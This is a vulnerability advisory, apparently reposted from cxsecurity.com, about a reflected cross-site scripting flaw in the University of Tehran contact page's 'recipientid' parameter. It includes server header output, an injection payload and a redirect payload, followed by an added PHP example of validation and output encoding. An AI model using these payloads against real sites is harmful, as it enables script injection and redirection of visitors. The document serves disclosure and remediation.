University of Tehran Cross-Site-Scripting Vulnerability

2017.08.22
Credit: 4TT4CK3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

The University of Tehran, also known as Tehran University and UT, is Iran's oldest modern university. It is also Iran's most prestigious university. Based on its historical, socio-cultural, and political pedigree, as well as its research and teaching profile, UT has been nicknamed "The mother university of Iran" and it is the symbol of higher education in Iran. It is almost always ranked as the best university in Iran in national and international rankings.

[+] In the name of god
[+] Exploit Title : University of Tehran Cross-Site-Scripting Vulnerability
[+] Exploit Author : 4TT4CK3R
[+] Tested on : All Platforms
[+] Date : 2017/08/23
[+] Home Page : http://ut.ac.ir/
[+] Some Info :
[--]4TT4CK3R@GrayBoy:~$ curl -I http://ut.ac.ir
[--]HTTP/1.1 302 Found
[--]Date: Mon, 21 Aug 2017 15:02:36 GMT
[--]Server: Apache/2.4.7 (Ubuntu)
[--]Accept-Ranges: bytes
[--]X-Powered-By: PHP/5.5.9-1ubuntu4.22
[--]Location: http://ut.ac.ir/fa
[--]Cache-Control: max-age=0
[--]Expires: Mon, 21 Aug 2017 15:02:36 GMT
[--]Content-Type: text/html; charset=UTF-8
[--]Connection: close
[+] Vulnerable Page : http://ut.ac.ir/fa/contactus
[+] Parameter for request : recipientid
[+] Payload : %22%22/%3E%3C%3C/ScrIpt%3E%3Cscript%3Ealert(%274TT4CK3R%27)%3C/script%3E
[+] Redirection : We can also redirect the target to another website :
[--] ""/><</ScrIpt><script>window.location="https://google.com";</script>
[+] ScreenShot : http://uupload.ir/files/2iyw_1.png
[+] Discovered by : 4TT4CK3R
[++] This vulnerability was reported to the target.
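The fix for a reflected parameter such as recipientid, shown beside the unsafe pattern, as an added example that is not part of the original advisory and not the site's own code. It assumes the value is echoed into an HTML attribute and that recipient ids are numeric; all function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed sample: the URL-decoded payload quoted in the advisory.
const SAMPLE_INPUT = '""/><</ScrIpt><script>alert(\'4TT4CK3R\')</script>';

// Assumed unsafe pattern: the raw parameter is concatenated into an attribute.
function render_vulnerable(string $recipientId): string
{
    return '<input type="hidden" name="recipientid" value="' . $recipientId . '">';
}

// Allow-list validation (assumption: recipient ids are short decimal numbers).
function parse_recipient_id(string $raw): ?int
{
    if (!preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Hardened rendering: validate first, then encode on output as a second layer.
function render_hardened(string $raw): string
{
    $id = parse_recipient_id($raw);
    if ($id === null) {
        // Reject instead of reflecting anything the client sent.
        return '<p>Unknown recipient.</p>';
    }
    $safe = htmlspecialchars((string) $id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="recipientid" value="' . $safe . '">';
}

// Encoding alone, for fields that must accept free text in an attribute.
function encode_attr(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

foreach ([SAMPLE_INPUT, '42'] as $input) {
    echo "input:      $input\n";
    echo "vulnerable: " . render_vulnerable($input) . "\n";
    echo "hardened:   " . render_hardened($input) . "\n";
    echo "encoded:    " . encode_attr($input) . "\n\n";
}
```

With the sample input, the unsafe renderer emits the quote and angle brackets verbatim so the markup closes the attribute, while the hardened renderer rejects the value and the encoder turns those characters into entities.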



Copyright 2017, cxsecurity.com

 
